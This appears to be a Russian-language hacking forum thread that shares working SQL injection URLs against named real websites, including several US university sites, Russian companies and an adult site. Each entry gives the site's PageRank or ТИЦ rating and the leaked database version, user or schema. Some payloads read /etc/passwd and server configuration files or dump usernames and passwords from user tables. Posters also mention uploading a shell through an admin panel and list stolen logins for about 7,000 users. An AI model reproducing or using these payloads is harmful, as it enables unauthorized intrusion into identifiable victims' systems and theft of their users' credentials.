SQL Инъекции

Code:

http://www.jaagle.com/cat.php?id=-44%27+union+select+1,2,3,4,5,user%28%29,7,8,9,10+--+

java4less_jaagle@localhost

PR: 3

Code:

http://www.gordonsmithguitars.com/products/category.php?id=-1+union+select+1,user%28%29,3,4,5--

[email protected]

PR: 3

Code:

c/category.php?id=-26+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

root@localhost

PR: 4

 

Code:

http://www.shampoor.ru/index.php?categoryID=-40+union+select+1,user%28%29,3,4,5,6,7,8,9,10--

[email protected]

 

ГЕОЛОГО - ГЕОФИЗИЧЕСКИЙ ФАКУЛЬТЕТ

 

Очередная партия скулей))

 

EDU

Не много .edu

PR - 6 CY 80

PR - 4 CY 0

PR - 6 CY 30

PR 2 CY 0

 

daily5remodel

 

Adult web design.

18+, ибо присутствуют голые тётки (Есть немного траффа)

PHP:

http://cremzinc.com/site.php?recordID=-8+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9--

Просто унылый сайт, через который была надежда добраться до интересующего "соседа".

PHP:

http://auto.kzd.ru/?pid=-4+uNioN+SeleCT+1,2,concat_ws(0x03a,database(),user(),version()) --

 

ledonnedelvino

 

lermitagehotel.ee PR-5 ТИЦ-500

Code:

www.lermitagehotel.ee/index.php?pageid=244+and+(select+1+from(select+count(*),concat((select+concat_ws(0x3a,version(),user(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--

Code:

5.1.49:lermitage@localhost:lermitage1

hillbss.com PR-5

Code:

www.hillbss.com/index.php?pageid=ClassDetail&classid=-63+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13--

Code:

5.1.53-log:[email protected]:urbss2011

 

Пачка EDU

Тиц 1800
Пр 8

PHP:

http://www.son.washington.edu/departments/pch/faculty_bio.asp?id=-1'+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--+f

PHP:

http://biology.burke.washington.edu/conus/videos/MovieWindow.php?ID=1+and(select+1+from(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Тиц 210
Пр 7

PHP:

http://special.library.louisville.edu/display-collection.asp?ID=-1+union+select+1,2,3,4,5,6+from+MSysAccessObjects

Тиц 700
пр 8

PHP:

http://biology.brown.edu/departments/?id=1+union+select+1,2,version(),4,5,6,7,8,9,10--+f


Тиц 1300
Пр 8

PHP:

http://www.math.indiana.edu/seminars/seminar.phtml?id=-1+union+select+load_file(0x2f6574632f706173737764),2,3,4,5,6,7--+f&all=1

Тиц 1200
Пр 8

PHP:

http://healthware.ucsd.edu/public/view/id/1-9999.9)+union+select+1111111,22222222,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4444444444,55555555,666666666,77777777777,888888888,99999999,10,11--+f

 

Тиц 30

Code:

http://semargl.net.ua/photo/indexex.php?id_parent=1+union+select+version()--

 

chumlung

 

PR ==6;

PHP:

http://www.benyagoda.com/show-story.php?id=-102+union+select+1,2,convert(version()+using+latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- 

PR == 4, DMOZ == true;

PHP:

http://www.vov.com/ichoose/story.php?id=-2+union+select+1,concat_ws(0x03a,username_usr,password_usr,email_usr),3,4,5+from+cms_user_usr -- 

PR == 4; вывод в <title>

PHP:

http://www.njar.com/story.php?id=-228+union+select+1,2,concat_ws(0x03a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- 

 

Корпоративное издание
ООО «Пермская финансово-производственная группа»

PHP:

http://pfp-gazeta.pfpg.ru/articles?rub=-1+union+select+1,2,3,4,5,6,7#

Shell отлично льется через администраторскую панель. Кстати, админка по дефолтному адресу: /admin

 

Самарская государственная сельскохозяйственная академия.

Code:

http://www.ssaa.ru/index.php?news=1488-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12-- 

Database Version: 5.5.25-cll
Database name: ssaa
User name: webadmin@localhost

ТИЦ: 475
PR: 5

 

www.minimaks.ru

www.minimaks.ru

Тиц 1000

Логины

Пароли

 

ПР=3, в базе ~7k юзеров

 

PR9

Тиц 800
PR 9

PHP:

http://groups.csail.mit.edu/locomotion/lrcc/robot.cgi?id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6--+f

Тиц 950
PR 8

PHP:

http://brainatlas.msu.edu/databases/msusection/details.php?id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+f

Тиц 140
PR 7

PHP:

http://java.fmcc.suny.edu/~fyunker/player.php?listname=rock&id=23&orderid=23+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,6,7,8--+g

Тиц 110
PR 7

PHP:

http://lowcountrydigital.library.cofc.edu/web/browse/type/results.php?sort=title&id=1&alpha=S'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Тиц 500
PR 7

PHP:

http://cs.gmu.edu/~jpsousa/bibadmin/show.php?id=-1'+union+select+1,2,(select(@n)from(select(@n:=0x20),(select(null)from(jpsousa_papers.bib_user)where(@n:=concat(@n,0x3c62723e,id,0x3a,user,0x3a,pass))))n),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+f&type=bib


 

Новостройки в Подмосковье.

Code:

http://www.iase.caravan.ru/dom-kvartira.php?unit=&group=&group2=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--

Database Version: 5.0.45
Database name: iase
User name: iase@localhost

ТИЦ: 0
PR: 2